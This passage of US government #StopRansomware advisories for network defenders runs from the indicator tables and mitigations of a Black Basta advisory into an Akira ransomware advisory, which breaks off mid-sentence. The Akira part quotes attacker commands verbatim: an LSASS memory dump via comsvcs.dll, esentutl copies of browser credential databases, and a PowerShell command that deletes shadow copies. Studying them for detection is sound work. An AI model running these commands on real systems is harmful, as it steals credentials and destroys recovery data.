188.130.218[.]39   188.130.137[.]181   46.8.10[.]134   155.138.246[.]122   80.239.207[.]200 winklen[.]ch 183.181.86[.]147 Xserver[.]jp 34.149.120[.]3   104.21.40[.]72   34.250.161[.]149   88.198.198[.]90 your-server[.]de; literoved[.]ru 35.244.153[.]44   35.212.86[.]55   34.251.163[.]236   34.160.81[.]203   34.149.36[.]179   104.21.26[.]145   83.243.40[.]10   35.227.194[.]51   35.190.31[.]54   34.120.190[.]48   116.203.186[.]178   34.160.17[.]71   Table 9: File Indicators Filename Hash C:\Users\Public\Audio\Jun.exe b6a4f4097367d9c124f51154d8750ea036a812d5badde0baf9c5f183bb53dd24 C:\Users\Public\Audio\esx.zip   C:\Users\Public\Audio\7zG.exe f21240e0bf9f0a391d514e34d4fa24ecb997d939379d2260ebce7c693e55f061 C:\Users\Public\Audio\7z.dll   C:\Users\Public\db_Usr.sql 8501e14ee6ee142122746333b936c9ab0fc541328f37b5612b6804e6cdc2c2c6 C:\Users\Public\Audio\db_Usr.sql   C:\Users\Public\Audio\hv2.ps1   C:\Users\Public\7zG.exe   C:\Users\Public\7z.dll   C:\Users\Public\BitLogic.dll   C:\Users\Public\NetApp.exe 4c897334e6391e7a2fa3cbcbf773d5a4 C:\Users\Public\DataSoft.exe 2642ec377c0cee3235571832cb472870 C:\Users\Public\BitData.exe b3fe23dd4701ed00d79c03043b0b952e C:\Users\Public\DigitalText.dll   C:\Users\Public\GeniusMesh.exe   \Device\Mup\{redacted}\C$\Users\Public\Music\PROCEXP.sys   \Device\Mup\{redacted}\C$\Users\Public\Music\DumpNParse86.exe   \Device\Mup\{redacted}\C$\Users\Public\Music\POSTDump.exe   \Device\Mup\{redacted}\C$\Users\Public\Music\DumpNParse.exe   C:\Users\Public\socksps.ps1   C:\Users\Public\Thief.exe 034b5fe047920b2ae9493451623633b14a85176f5eea0c7aadc110ea1730ee79 C:\Users\All Users\{redacted}\GWT.ps1 C:\Program Files\MonitorIT\GWT.ps1 8C68B2A794BA3D148CAE91BDF9C8D357289752A94118B5558418A36D95A5A45F Winx86.exe  Comment: alias for cmd.exe   C:\Users\Public\eucr.exe 3c65da7f7bfdaf9acc6445abbedd9c4e927d37bb9e3629f34afc338058680407 C:\Windows\DS_c1.dll 808c96cb90b7de7792a827c6946ff48123802959635a23bf9d98478ae6a259f9 C:\Windows\DS_c1.dll 3a8fc07cadc08eeb8be342452636a754158403c3d4ebff379a4ae66f8298d9a6 C:\Windows\DS_c1.dll 4ac69411ed124da06ad66ee8bfbcea2f593b5b199a2c38496e1ee24f9d04f34a C:\Windows\DS_c1.dll 819cb9bcf62be7666db5666a693524070b0df589c58309b067191b30480b0c3a C:\Windows\DS_c1.dll c26a5cb62a78c467cc6b6867c7093fbb7b1a96d92121d4d6c3f0557ef9c881e0 C:\Windows\DS_c1.dll d503090431fdd99c9df3451d9b73c5737c79eda6eb80c148b8dc71e84623401f *\instructions_read_me.txt   Table 10: Known Black Basta Cobalt Strike Domains Domain Date/Time (UTC)/Time (UTC) trailshop[.]net 5/8/2024 6:37 realbumblebee[.]net 5/8/2024 6:37 recentbee[.]net 5/8/2024 6:37 investrealtydom[.]net 5/8/2024 6:37 webnubee[.]com 5/8/2024 6:37 artspathgroup[.]net 5/8/2024 6:37 buyblocknow[.]com 5/8/2024 6:37 currentbee[.]net 5/8/2024 6:37 modernbeem[.]net 5/8/2024 6:37 startupbusiness24[.]net 5/8/2024 6:37 magentoengineers[.]com 5/8/2024 6:37 childrensdolls[.]com 5/8/2024 6:37 myfinancialexperts[.]com 5/8/2024 6:37 limitedtoday[.]com 5/8/2024 6:37 kekeoamigo[.]com 5/8/2024 6:37 nebraska-lawyers[.]com 5/8/2024 6:37 tomlawcenter[.]com 5/8/2024 6:37 thesmartcloudusa[.]com 5/8/2024 6:37 rasapool[.]net 5/8/2024 6:37 artspathgroupe[.]net 5/8/2024 6:37 specialdrills[.]com 5/8/2024 6:37 thetrailbig[.]net 5/8/2024 6:37 consulheartinc[.]com 3/22/2024 15:35 otxcosmeticscare[.]com 3/15/2024 10:14 otxcarecosmetics[.]com 3/15/2024 10:14 artstrailman[.]com 3/15/2024 10:14 ontexcare[.]com 3/15/2024 10:14 trackgroup[.]net 3/15/2024 10:14 businessprofessionalllc[.]com 3/15/2024 10:14 securecloudmanage[.]com 3/7/2024 10:42 oneblackwood[.]com 3/7/2024 10:42 buygreenstudio[.]com 3/7/2024 10:42 startupbuss[.]com 3/7/2024 10:42 onedogsclub[.]com 3/4/2024 18:26 wipresolutions[.]com 3/4/2024 18:26 recentbeelive[.]com 3/4/2024 18:26 trailcocompany[.]com 3/4/2024 18:26 trailcosolutions[.]com 3/4/2024 18:26 artstrailreviews[.]com 3/4/2024 18:26 usaglobalnews[.]com 2/15/2024 5:56 topglobaltv[.]com 2/15/2024 5:56 startupmartec[.]net 2/15/2024 5:56 technologgies[.]com 1/2/2024 18:16 jenshol[.]com 1/2/2024 18:16 simorten[.]com 1/2/2024 18:16 investmentgblog[.]net 1/2/2024 18:16 protectionek[.]com 1/2/2024 18:16 Table 11: Suspected Black Basta Domains airbusco[.]net allcompanycenter[.]com animalsfast[.]net audsystemecll[.]net auuditoe[.]com bluenetworking[.]net brendonline[.]com businesforhome[.]com caspercan[.]com clearsystemwo[.]net cloudworldst[.]net constrtionfirst[.]com erihudeg[.]com garbagemoval[.]com gartenlofti[.]com getfnewsolutions[.]com getfnewssolutions[.]com investmendvisor[.]net investmentrealtyhp[.]net ionoslaba[.]com jessvisser[.]com karmafisker[.]com kolinileas[.]com maluisepaul[.]com masterunix[.]net monitor-websystem[.]net monitorsystem[.]net mytrailinvest[.]net prettyanimals[.]net reelsysmoona[.]net seohomee[.]com septcntr[.]com softradar[.]net startupbizaud[.]net startuptechnologyw[.]net steamteamdev[.]net stockinvestlab[.]net taskthebox[.]net trailgroupl[.]net treeauwin[.]net unitedfrom[.]com unougn[.]com wardeli[.]com welausystem[.]net wellsystemte[.]net withclier[.]com MITIGATIONS The authoring organizations recommend all critical infrastructure organizations implement the mitigations below to improve your organization’s cybersecurity posture based on Black Basta’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Install updates for operating systems, software, and firmware as soon as they are released [CPG 1.E]. Prioritize updating Known Exploited Vulnerabilities (KEV). Require phishing-resistant multi-factor authentication (MFA) [CPG 2.H] for as many services as possible. Implement recommendations, including training users to recognize and report phishing attempts [CPG 2.I], from joint Phishing Guidance: Stopping the Attack Cycle at Phase One. Secure remote access software by applying mitigations from joint Guide to Securing Remote Access Software. Make backups of critical systems and device configurations [CPG 2.R] to enable devices to be repaired and restored. Apply mitigations from the joint #StopRansomware Guide. The authoring organizations also recommend network defenders of HPH Sector and other critical infrastructure organizations to reference CISA’s Mitigation Guide: Healthcare and Public Health (HPH) Sector and HHS’s HPH Cybersecurity Performance Goals, which provide best practices to combat pervasive cyber threats against organizations. Recommendations include the following: Asset Management and Security: Cybersecurity professionals should identify and understand all relationships or interdependencies, functionality of each asset, what it exposes, and what software is running to ensure critical data and systems are protected appropriately. HPH Sector organizations should ensure electronic PHI (ePHI) is protected and compliant with the Health Insurance Portability and Accountability Act (HIPAA). Organizations can complete asset inventories using active scans, passive processes, or a combination of both techniques. Email Security and Phishing Prevention: Organizations should install modern anti-malware software and automatically update signatures where possible. For additional guidance, see CISA’s Enhance Email and Web Security Guide. Check for embedded or spoofed hyperlinks: Validate the URL of the link matches the text of the link itself. This can be achieved by hovering your cursor over the link to view the URL of the website to be accessed. Access Management: Phishing-resistant MFA completes the same process but removes ‘people’ from the equation to help thwart social engineering scams and targeted phishing attacks that may have been successful using traditional MFA. The two main forms of phishing-resistant MFA are FIDO/Web Authentication (WebAuthn) authentication and Public Key Infrastructure (PKI)-based authentication. Prioritize phishing-resistant MFA on accounts with the highest risk, such as privileged administrative accounts on key assets. For additional information on phishing-resistant MFA, see CISA’s Implementing Phishing-Resistant MFA Guide. Vulnerability Management and Assessment: Once vulnerabilities are identified across your environment, evaluate and prioritize to appropriately deal with the posed risks according to your organization’s risk strategy. To assist with prioritization, it is essential to: Map your assets to business-critical functions. For vulnerability remediation, prioritize assets that are most critical for ongoing operations or which, if affected, could impact your organization’s business continuity, sensitive PII (or PHI) security, reputation, or financial position. Use threat intelligence information. For remediation, prioritize vulnerabilities actively exploited by threat actors. To assist, leverage CISA’s KEV Catalog and other threat intelligence feeds. Leverage prioritization methodologies, ratings, and scores. The Common Vulnerability Scoring System (CVSS) assesses the technical severity of vulnerabilities. The Exploit Prediction Scoring System (EPSS) measures the likelihood of exploitation and can help with deciding which vulnerabilities to prioritize. CISA’s Stakeholder-Specific Vulnerability Categorization (SSVC) methodology leverages decision trees to prioritize relevant vulnerabilities into four decisions, Track, Track*, Attend, and Act based on exploitation status, technical impact, mission prevalence, and impacts to safety and public-wellbeing. VALIDATE SECURITY CONTROLS In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Tables 2-6). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. REFERENCES SentinelOne: Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor Trend Micro: Ransomware Spotlight – Black Basta Kroll: Black Basta – Technical Analysis Who Is Black Basta? (blackberry.com) Palo Alto Networks: Threat Assessment – Black Basta Ransomware REPORTING Your organization has no obligation to respond or provide information back to FBI in response to this joint CSA. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws. FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Additional details of interest include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators. FBI, CISA, and HHS do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to FBI’s Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov or by calling 1-844-Say-CISA [1-844-729-2472]). DISCLAIMER The information in this report is being provided “as is” for informational purposes only. FBI, CISA, HHS, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, HHS, and MS-ISAC. VERSION HISTORY May 10, 2024: Initial version.

SUMMARY Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources. The United States’ Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Europol’s European Cybercrime Centre (EC3), and the Netherlands’ National Cyber Security Centre (NCSC-NL) are releasing this joint CSA to disseminate known Akira ransomware IOCs and TTPs identified through FBI investigations and trusted third party reporting as recently as February 2024. Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia. In April 2023, following an initial focus on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines. As of January 1, 2024, the ransomware group has impacted over 250 organizations and claimed approximately $42 million (USD) in ransomware proceeds. Early versions of the Akira ransomware variant were written in C++ and encrypted files with a .akira extension; however, beginning in August 2023, some Akira attacks began deploying Megazord, using Rust-based code which encrypts files with a .powerranges extension.  Akira threat actors have continued to use both Megazord and Akira, including Akira_v2 (identified by trusted third party investigations) interchangeably. The FBI, CISA, EC3, and NCSC-NL encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents. Download the PDF version of this report: AA24-109A #StopRansomware: Akira Ransomware (PDF, 591.05 KB ) For a downloadable copy of IOCs, see: AA24-109A STIX XML (XML, 114.01 KB ) AA24-109A STIX JSON (JSON, 67.80 KB ) TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques. Initial Access The FBI and cybersecurity researchers have observed Akira threat actors obtaining initial access to organizations through a virtual private network (VPN) service without multifactor authentication (MFA) configured[1], mostly using known Cisco vulnerabilities [T1190] CVE-2020-3259 and CVE-2023-20269.[2],[3],[4] Additional methods of initial access include the use of external-facing services such as Remote Desktop Protocol (RDP) [T1133], spear phishing [T1566.001][T1566.002], and the abuse of valid credentials[T1078].[4] Persistence and Discovery Once initial access is obtained, Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts [T1136.002] to establish persistence. In some instances, the FBI identified Akira threat actors creating an administrative account named itadm. According to FBI and open source reporting, Akira threat actors leverage post-exploitation attack techniques, such as Kerberoasting[5], to extract credentials stored in the process memory of the Local Security Authority Subsystem Service (LSASS) [T1003.001].[6] Akira threat actors also use credential scraping tools [T1003] like Mimikatz and LaZagne to aid in privilege escalation. Tools like SoftPerfect and Advanced IP Scanner are often used for network device discovery (reconnaissance) purposes [T1016] and net Windows commands are used to identify domain controllers [T1018] and gather information on domain trust relationships [T1482]. See Table 1 for a descriptive listing of these tools. Defense Evasion Based on trusted third party investigations, Akira threat actors have been observed deploying two distinct ransomware variants against different system architectures within the same compromise event. This marks a shift from recently reported Akira ransomware activity. Akira threat actors were first observed deploying the Windows-specific “Megazord” ransomware, with further analysis revealing that a second payload was concurrently deployed in this attack (which was later identified as a novel variant of the Akira ESXi encryptor, “Akira_v2”). As Akira threat actors prepare for lateral movement, they commonly disable security software to avoid detection. Cybersecurity researchers have observed Akira threat actors using PowerTool to exploit the Zemana AntiMalware driver[4] and terminate antivirus-related processes [T1562.001]. Exfiltration and Impact Akira threat actors leverage tools such as FileZilla, WinRAR [T1560.001], WinSCP, and RClone to exfiltrate data [T1048]. To establish command and control channels, threat actors leverage readily available tools like AnyDesk, MobaXterm, RustDesk, Ngrok, and Cloudflare Tunnel, enabling exfiltration through various protocols such as File Transfer Protocol (FTP), Secure File Transfer Protocol (SFTP), and cloud storage services like Mega [T1537] to connect to exfiltration servers. Akira threat actors use a double-extortion model [T1657] and encrypt systems [T1486] after exfiltrating data. The Akira ransom note provides each company with a unique code and instructions to contact the threat actors via a .onion URL. Akira threat actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim. Ransom payments are paid in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. To further apply pressure, Akira threat actors threaten to publish exfiltrated data on the Tor network, and in some instances have called victimized companies, according to FBI reporting. Encryption Akira threat actors utilize a sophisticated hybrid encryption scheme to lock data. This involves combining a ChaCha20 stream cipher with an RSA public-key cryptosystem for speed and secure key exchange [T1486]. This multilayered approach tailors encryption methods based on file type and size and is capable of full or partial encryption. Encrypted files are appended with either a .akira or .powerranges extension. To further inhibit system recovery, Akira’s encryptor (w.exe) utilizes PowerShell commands to delete volume shadow copies (VSS) on Windows systems [T1490]. Additionally, a ransom note named fn.txt appears in both the root directory (C:) and each users’ home directory (C:\Users). Trusted third party analysis identified that the Akira_v2 encryptor is an upgrade from its previous version, which includes additional functionalities due to the language it’s written in (Rust). Previous versions of the encryptor provided options to insert arguments at runtime, including: -p –encryption_path (targeted file/folder paths) -s –share_file (targeted network drive path) -n –encryption_percent (percentage of encryption) –fork (create a child process for encryption The ability to insert additional threads allows Akira threat actors to have more granular control over the number of CPU cores in use, increasing the speed and efficiency of the encryption process. The new version also adds a layer of protection, utilizing the Build ID as a run condition to hinder dynamic analysis. The encryptor is unable to execute successfully without the unique Build ID. The ability to deploy against only virtual machines using “vmonly” and the ability to stop running virtual machines with “stopvm” functionalities have also been observed implemented for Akira_v2. After encryption, the Linux ESXi variant may include the file extension “akiranew” or add a ransom note named “akiranew.txt” in directories where files were encrypted with the new nomenclature. Leveraged Tools Table 1 lists publicly available tools and applications Akira threat actors have used, including legitimate tools repurposed for their operations. Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control. Table 1: Tools Leveraged by Akira Ransomware Actors Name Description AdFind AdFind.exe is used to query and retrieve information from Active Directory. Advanced IP Scanner A network scanner is used to locate all the computers on a network and conduct a scan of their ports. The program shows all network devices, gives access to shared folders, and provides remote control of computers (via RDP and Radmin). AnyDesk A common software that can be maliciously used by threat actors to obtain remote access and maintain persistence [T1219]. AnyDesk also supports remote file transfer. LaZagne Allows users to recover stored passwords on Windows, Linux, and OSX systems. PCHunter64 A tool used to acquire detailed process and system information [T1082].[7] PowerShell A cross-platform task automation solution made up of a command line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS. Mimikatz Allows users to view and save authentication credentials such as Kerberos tickets. Ngrok A reverse proxy tool [T1090] used to create a secure tunnel to servers behind firewalls or local machines without a public IP address. RClone A command line program used to sync files with cloud storage services [T1567.002] such as Mega. SoftPerfect A network scanner (netscan.exe) used to ping computers, scan ports, discover shared folders, and retrieve information about network devices via Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell. It also scans for remote services, registry, files, and performance counters. WinRAR Used to split compromised data into segments and to compress [T1560.001] files into .RAR format for exfiltration. WinSCP Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Akira threat actors have used it to transfer data [T1048] from a compromised network to actor-controlled accounts. Indicators of Compromise Disclaimer: Investigation or vetting of these indicators is recommended prior to taking action, such as blocking. Table 2a: Malicious Files Affiliated with Akira Ransomware File Name Hash (SHA-256) Description w.exe d2fd0654710c27dcf37b6c1437880020824e161dd0bf28e3a133ed777242a0ca Akira ransomware Win.exe dcfa2800754e5722acf94987bb03e814edcb9acebda37df6da1987bf48e5b05e Akira ransomware encryptor AnyDesk.exe bc747e3bf7b6e02c09f3d18bdd0e64eef62b940b2f16c9c72e647eec85cf0138 Remote desktop application Gcapi.dll 73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf DLL file that assists with the execution of AnyDesk.exe Sysmon.exe 1b60097bf1ccb15a952e5bcc3522cf5c162da68c381a76abc2d5985659e4d386 Ngrok tool for persistence Config.yml Varies by use Ngrok configuration file Rclone.exe aaa647327ba5b855bedea8e889b3fafdc05a6ca75d1cfd98869432006d6fecc9 Exfiltration tool Winscp.rnd 7d6959bb7a9482e1caa83b16ee01103d982d47c70c72fdd03708e2b7f4c552c4 Network file transfer program WinSCP-6.1.2-Setup.exe 36cc31f0ab65b745f25c7e785df9e72d1c8919d35a1d7bd4ce8050c8c068b13c Network file transfer program Akira_v2 3298d203c2acb68c474e5fdad8379181890b4403d6491c523c13730129be3f75 0ee1d284ed663073872012c7bde7fac5ca1121403f1a5d2d5411317df282796c Akira_v2 ransomware Megazord ffd9f58e5fe8502249c67cad0123ceeeaa6e9f69b4ec9f9e21511809849eb8fc dfe6fddc67bdc93b9947430b966da2877fda094edf3e21e6f0ba98a84bc53198 131da83b521f610819141d5c740313ce46578374abb22ef504a7593955a65f07 9f393516edf6b8e011df6ee991758480c5b99a0efbfd68347786061f0e04426c 9585af44c3ff8fd921c713680b0c2b3bbc9d56add848ed62164f7c9b9f23d065 2f629395fdfa11e713ea8bf11d40f6f240acf2f5fcf9a2ac50b6f7fbc7521c83 7f731cc11f8e4d249142e99a44b9da7a48505ce32c4ee4881041beeddb3760be 95477703e789e6182096a09bc98853e0a70b680a4f19fa2bf86cbb9280e8ec5a 0c0e0f9b09b80d87ebc88e2870907b6cacb4cd7703584baf8f2be1fd9438696d C9c94ac5e1991a7db42c7973e328fceeb6f163d9f644031bdfd4123c7b3898b0 Akira “Megazord” ransomware VeeamHax.exe aaa6041912a6ba3cf167ecdb90a434a62feaf08639c59705847706b9f492015d Plaintext credential leaking tool Veeam-Get-Creds.ps1 18051333e658c4816ff3576a2e9d97fe2a1196ac0ea5ed9ba386c46defafdb88 PowerShell script for obtaining and decrypting accounts from Veeam servers PowershellKerberos TicketDumper 5e1e3bf6999126ae4aa52146280fdb913912632e8bac4f54e98c58821a307d32 Kerberos ticket dumping tool from LSA cache sshd.exe 8317ff6416af8ab6eb35df3529689671a700fdb61a5e6436f4d6ea8ee002d694 OpenSSH Backdoor ipscan-3.9.1-setup.exe 892405573aa34dfc49b37e4c35b655543e88ec1c5e8ffb27ab8d1bbf90fc6ae0 Network scanner that scans IP addresses and ports Table 2b: Malicious Files Affiliated with Akira Ransomware File Name Hash (MD5) Description winrar-x64-623.exe 7a647af3c112ad805296a22b2a276e7c Network file transfer program Disclaimer: While the date/time can be changed by Akira threat actors, trusted third-party analysis confirmed these samples were created on December 28, 2023. Table 3: Windows Akira Ransomware Samples Hash (SHA-256) 0b5b31af5956158bfbd14f6cbf4f1bca23c5d16a40dbf3758f3289146c565f43 0d700ca5f6cc093de4abba9410480ee7a8870d5e8fe86c9ce103eec3872f225f a2df5477cf924bd41241a3326060cc2f913aff2379858b148ddec455e4da67bc 03aa12ac2884251aa24bf0ccd854047de403591a8537e6aba19e822807e06a45 2e88e55cc8ee364bf90e7a51671366efb3dac3e9468005b044164ba0f1624422 40221e1c2e0c09bc6104548ee847b6ec790413d6ece06ad675fff87e5b8dc1d5 5ea65e2bb9d245913ad69ce90e3bd9647eb16d992301145372565486c77568a2 643061ac0b51f8c77f2ed202dc91afb9879f796ddd974489209d45f84f644562 6f9d50bab16b2532f4683eeb76bd25449d83bdd6c85bf0b05f716a4b49584f84 fef09b0aa37cbdb6a8f60a6bd8b473a7e5bffdc7fd2e952444f781574abccf64 Table 4: Linux/Unix Akira Ransomware Executable and Linkable Format (ELF) Samples Hash (SHA-256) e1321a4b2b104f31aceaf4b19c5559e40ba35b73a754d3ae13d8e90c53146c0f 74f497088b49b745e6377b32ed5d9dfaef3c84c7c0bb50fabf30363ad2e0bfb1 3d2b58ef6df743ce58669d7387ff94740ceb0122c4fc1c4ffd81af00e72e60a4 Table 5a: Commands Affiliated with Akira Ransomware Persistence and Discovery nltest /dclist: [T1018] nltest /DOMAIN_TRUSTS [T1482] net group “Domain admins” /dom [T1069.002] net localgroup “Administrators” /dom [T1069.001] tasklist [T1057] rundll32.exe c:\Windows\System32\comsvcs.dll, MiniDump ((Get-Process lsass).Id) C:\windows\temp\lsass.dmp full [T1003.001] Table 5b: Commands Affiliated with Akira Ransomware Credential Access cmd.exe /Q /c esentutl.exe /y “C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\<firefox_profile_id>.default-release\key4.db” /d “C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\<firefox_profile_id>.default-release\key4.db.tmp” Note: Used for accessing Firefox data. cmd.exe /Q /c esentutl.exe /y “C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\Login Data” /d “C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp” Note: Used for accessing Google Chrome data. Table 5c: Commands Affiliated with Akira Ransomware Impact powershell.exe -Command “Get-WmiObject Win32_Shadowcopy | Remove-WmiObject” [T1490] MITRE ATT&CK TACTICS AND TECHNIQUES See Tables 6 -14 for all referenced Akira threat actor tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Table 6: Initial Access Technique Title ID Use Valid Accounts T1078 Akira threat actors obtain and abuse credentials of existing accounts as a means of gaining initial access. Exploit Public Facing Application T1190 Akira threat actors exploit vulnerabilities in internet-facing systems to gain access to systems. External Remote Services T1133 Akira threat actors have used remote access services, such as RDP/VPN connection to gain initial access. Phishing: Spearphishing Attachment  T1566.001 Akira threat actors use phishing emails with malicious attachments to gain access to networks. Phishing: Spearphishing Link  T1566.002 Akira threat actors use phishing emails with malicious links to gain access to networks.  Table 7: Credential Access Technique Title ID Use OS Credential Dumping T1003 Akira threat actors use tools like Mimikatz and LaZagne to dump credentials. OS Credential Dumping: LSASS Memory T1003.001 Akira threat actors attempt to access credential material stored in the process memory of the LSASS. Table 8: Discovery Technique Title ID Use System Network Configuration Discovery  T1016 Akira threat actors use tools to scan systems and identify services running on remote hosts and local network infrastructure. System Information Discovery T1082 Akira threat actors use tools like PCHunter64 to acquire detailed process and system information. Domain Trust Discovery T1482 Akira threat actors use the net Windows command to enumerate domain information. Process Discovery T1057 Akira threat actors use the Tasklist utility to obtain details on running processes via PowerShell. Permission Groups Discovery: Local Groups T1069.001 Akira threat actors use the net localgroup /dom to find local system groups and permission settings. Permission Groups Discovery: Domain Groups  T1069.002 Akira threat actors use the net group /domain command to attempt to find domain level groups and permission settings. Remote System Discovery T1018 Akira threat actors use nltest / dclist to amass a listing of other systems by IP address, hostname, or other logical identifiers on a network. Table 9: Persistence Technique Title ID Use Create Account: Domain Account T1136.002 Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts to establish persistence. Table 10: Defense Evasion Technique Title ID Use Impair Defenses: Disable or Modify Tools T1562.001 Akira threat actors use BYOVD attacks to disable antivirus software. Table 11: Command and Control Technique Title ID Use Remote Access Software T1219 Akira threat actors use legitimate desktop support software like AnyDesk to obtain remote access to victim systems. Proxy T1090 Akira threat actors utilized Ngrok to create a secure tunnel to servers that aided in exfiltration of data.  Table 12: Collection Technique Title ID Use Archive Collected Data: Archive via Utility T1560.001 Akira threat actors use tools like WinRAR to compress files. Table 13: Exfiltration Technique Title ID Use Exfiltration Over Alternative Protocol T1048 Akira threat actors use file transfer tools like WinSCP to transfer data. Transfer Data to Cloud Account T1537 Akira threat actors use tools like CloudZilla to exfiltrate data to a cloud account and connect to exfil servers they control. Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 Akira threat actors leveraged RClone to sync files with cloud storage services to exfiltrate data.  Table 14: Impact Technique Title ID Use Date Encrypted for Impact T1486 Akira threat actors encrypt data on target systems to interrupt availability to system and network resources. Inhibit System Recovery T1490 Akira threat actors delete volume shadow copies on Windows systems. Financial Theft T1657 Akira threat actors use a double-extortion model for financial gain. MITIGATIONS Network Defenders The FBI, CISA, EC3, and NCSC-NL recommend organizations apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Akira ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [CPG 2.F, 2.R, 2.S]. Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST’s standards. In particular, require employees to use long passwords and consider not requiring recurring password changes, as these can weaken security [CPG 2.C]. Require multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [CPG 2.H]. Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems. [CPG 1.E]. Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F]. Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A]. Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents threat actors from directly connecting to remote access services that they have established for persistence. Install, regularly update, and enable real time detection for antivirus software on all hosts. Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 1.A, 2.O]. Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.E]. Disable unused ports [CPG 2.V]. Consider adding an email banner to emails received from outside of your organization [CPG 2.M]. Disable hyperlinks in received emails. Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task. Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.E, 2.N]. Maintain 